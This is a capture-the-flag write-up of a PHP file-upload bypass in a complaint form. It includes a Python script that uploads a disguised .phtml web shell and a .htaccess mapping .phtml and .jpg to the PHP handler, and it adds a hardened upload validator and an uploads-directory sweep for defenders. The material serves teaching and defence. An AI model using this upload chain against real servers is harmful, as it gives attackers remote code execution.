legal-complaint-form
SRC: https://library.m0unt41n.ch/challenges/legal-complaint-form
Okay, first of all, I consider myself a PHP pro, but damn, I h8 Apache... my main stack uses nginx as the web server...
This chall requires two main steps.
1. First of all, there is a malicious file upload vuln... the MIME-type validation is insecure because it only checks the Content-Type header, which can be forged by a custom request... the actual file can still be PHP, for example.
PHP:
    if (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/gif', 'image/png', 'application/pdf'])) {
        header('Location: /?error='.urlencode("Invalid file!"));
        exit();
    }
2. So we can now just upload a shell and obtain the flag... BUUUT NO! There is an .htaccess preventing .php files from being accessed, and .phtml or .PHP or .pHp etc. is not properly executed as PHP. So we have to do another lil trickery... we just upload another .htaccess LOL
.htaccess:
    AddHandler application/x-httpd-php .phtml .jpg
We basically just add .phtml as an actual PHP handler lulz.
Our final payload looks something like this:
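As an added example (mine, not the challenge's or the author's code), here is the kind of server-side validation that closes both holes above. It ignores the client-supplied Content-Type and sniffs the bytes on disk instead, ties the stored extension to the detected type, and rejects dotfiles and double extensions so an uploaded .htaccess never lands in the directory. The magic-byte table, validate_upload() and the constructed test inputs are all assumptions of this example; the four accepted types are the ones from the in_array() check.

```php
<?php
// Added example (not the challenge's own code): a hardened replacement for the
// Content-Type check quoted above. $_FILES['file']['type'] is attacker-controlled,
// so this inspects the bytes on disk and the extension, and picks the stored
// filename itself.

declare(strict_types=1);

// Magic bytes -> canonical MIME type, for the four types the form accepts.
const MAGIC = [
    "\xFF\xD8\xFF"        => 'image/jpeg',
    "\x89PNG\r\n\x1A\n"   => 'image/png',
    "GIF87a"              => 'image/gif',
    "GIF89a"              => 'image/gif',
    "%PDF-"               => 'application/pdf',
];

// The single extension each detected type may be stored under.
const EXT_FOR = [
    'image/jpeg'      => 'jpg',
    'image/png'       => 'png',
    'image/gif'       => 'gif',
    'application/pdf' => 'pdf',
];

// Read the first 8 bytes and match them against the table; null if unknown.
function sniff_mime(string $path): ?string {
    $head = file_get_contents($path, false, null, 0, 8);
    if ($head === false) return null;
    foreach (MAGIC as $sig => $mime) {
        if (strncmp($head, $sig, strlen($sig)) === 0) return $mime;
    }
    return null;
}

/**
 * Validate an upload. $tmpPath is the server-side temp file, $clientName the
 * name the client claimed. Returns [true, 'stored-name.ext'] or [false, reason].
 */
function validate_upload(string $tmpPath, string $clientName): array {
    $base = basename($clientName);
    // Reject dotfiles (.htaccess, .user.ini) and anything with path characters.
    if ($base === '' || $base[0] === '.' || strpbrk($base, "/\\\0") !== false) {
        return [false, 'bad filename'];
    }
    // Reject multiple extensions (shell.php.jpg) before looking at the last one.
    if (substr_count($base, '.') !== 1) {
        return [false, 'exactly one extension required'];
    }
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    $mime = sniff_mime($tmpPath);
    if ($mime === null) {
        return [false, 'unrecognised content'];
    }
    // Extension must agree with the sniffed content; "jpeg" is normalised to "jpg".
    $ext = $ext === 'jpeg' ? 'jpg' : $ext;
    if ($ext !== EXT_FOR[$mime]) {
        return [false, "extension .$ext does not match $mime"];
    }
    // Never store under the client's name: random name, server-chosen extension.
    return [true, bin2hex(random_bytes(16)) . '.' . EXT_FOR[$mime]];
}

// --- demo on constructed inputs (not real uploads) ---
$cases = [
    // what the writeup uploads: PHP source under a .phtml name, Content-Type lied about
    ['shell.phtml', "<?php echo 'x';"],
    // the .htaccess trick: AddHandler line sent with a PDF Content-Type
    ['.htaccess',   "AddHandler application/x-httpd-php .phtml .jpg\n"],
    // a genuine PNG header under a matching extension
    ['photo.png',   "\x89PNG\r\n\x1A\n" . str_repeat("\0", 16)],
    // PNG bytes but the wrong extension
    ['photo.pdf',   "\x89PNG\r\n\x1A\n" . str_repeat("\0", 16)],
];
foreach ($cases as [$name, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    [$ok, $info] = validate_upload($tmp, $name);
    printf("%-12s -> %s %s\n", $name, $ok ? 'ACCEPT' : 'REJECT', $info);
    unlink($tmp);
}
```

In a real handler you would also check $_FILES['file']['error'] === UPLOAD_ERR_OK and is_uploaded_file() before touching the temp path, and finfo_file() with FILEINFO_MIME_TYPE can replace the hand-rolled table. Content sniffing alone is not sufficient, though: a file that starts with %PDF- can still carry PHP source further in, so the uploads directory must never be executable. On Apache that means AllowOverride None for that directory, so an uploaded .htaccess is ignored, and no PHP handler mapped there (php_admin_flag engine off with mod_php).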
Python:
    import os
    import requests

    BASE_DIR = os.path.dirname(os.path.abspath(__file__))
    URL = 'https://x.library.m0unt41n.ch:31337/submit.php'

    # Step 1: upload the PHP source under a .phtml name; the claimed MIME type
    # is application/pdf so the server's Content-Type check passes.
    with open(os.path.join(BASE_DIR, 'shell.php'), 'rb') as f:
        files = {'file': ('shell.phtml', f, 'application/pdf')}
        data = {'email': '[email protected]', 'description': 'shell upload'}
        resp = requests.post(URL, files=files, data=data)
    print(f"Status: {resp.status_code}")
    print(resp.text)

    # Step 2: upload the .htaccess that maps .phtml (and .jpg) to the PHP handler.
    with open(os.path.join(BASE_DIR, '.htaccess'), 'rb') as f:
        files = {'file': ('.htaccess', f, 'application/pdf')}
        data = {'email': '[email protected]', 'description': 'htaccess upload'}
        r = requests.post(URL, files=files, data=data)
    print("htaccess upload:", r.status_code)
And after successfully uploading the .htaccess and the shell, we can visit the "case" page at /case.php?id=IDHERE and then click on the file... /uploads/shell.phtml
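For the defensive side of that last step, here is an added example (mine, not part of the writeup) of a sweep a responder could run over an uploads directory to find the artifacts this technique leaves behind: dotfiles, extensions outside the allowlist, and uploaded "documents" that contain PHP open tags or Apache handler directives. The directory, its files and the allowlist are constructed for the demo so the script runs offline.

```php
<?php
// Added example, not from the challenge: an incident-response sweep of an
// uploads directory for the two artifacts this bypass leaves behind: a dotfile
// (.htaccess) carrying handler directives, and files whose bytes are PHP source
// regardless of extension. The directory contents below are constructed.

declare(strict_types=1);

// Extensions the upload form is supposed to produce (assumed allowlist).
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

// Substrings that should never appear in a user-uploaded image or PDF.
const SUSPECT_TOKENS = ['<?php', '<?=', 'AddHandler', 'AddType', 'SetHandler', 'php_value', 'php_flag'];

/** Return a list of [filename, reason] findings for one directory. */
function sweep_uploads(string $dir): array {
    $findings = [];
    foreach (new DirectoryIterator($dir) as $entry) {
        if ($entry->isDot() || !$entry->isFile()) continue;
        $name = $entry->getFilename();
        // Any dotfile in an upload directory is a finding on its own.
        if ($name[0] === '.') {
            $findings[] = [$name, 'dotfile in upload directory'];
        } else {
            $ext = strtolower($entry->getExtension());
            if (!in_array($ext, ALLOWED_EXT, true)) {
                $findings[] = [$name, "extension .$ext not in allowlist"];
            }
        }
        // Content check: report the first suspicious token found, if any.
        $bytes = file_get_contents($entry->getPathname());
        foreach (SUSPECT_TOKENS as $tok) {
            if (stripos($bytes, $tok) !== false) {
                $findings[] = [$name, "contains '$tok'"];
                break;
            }
        }
    }
    return $findings;
}

// --- demo: constructed directory contents mirroring the writeup ---
$dir = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/.htaccess",   "AddHandler application/x-httpd-php .phtml .jpg\n");
file_put_contents("$dir/shell.phtml", "<?php echo 'x'; ?>");
file_put_contents("$dir/cat.jpg",     "\xFF\xD8\xFF\xE0" . str_repeat("\0", 32));
file_put_contents("$dir/report.pdf",  "%PDF-1.4\n%constructed sample\n");

foreach (sweep_uploads($dir) as [$file, $reason]) {
    printf("%-12s %s\n", $file, $reason);
}

// Clean up the constructed directory.
foreach (new DirectoryIterator($dir) as $entry) {
    if ($entry->isFile()) unlink($entry->getPathname());
}
rmdir($dir);
```

The token scan is deliberately broad (it will flag a legitimate PDF that happens to embed a PHP snippet) because the goal is triage, not a verdict. Even where AllowOverride None already makes an uploaded .htaccess inert, its presence in the directory is worth logging as an exploitation attempt.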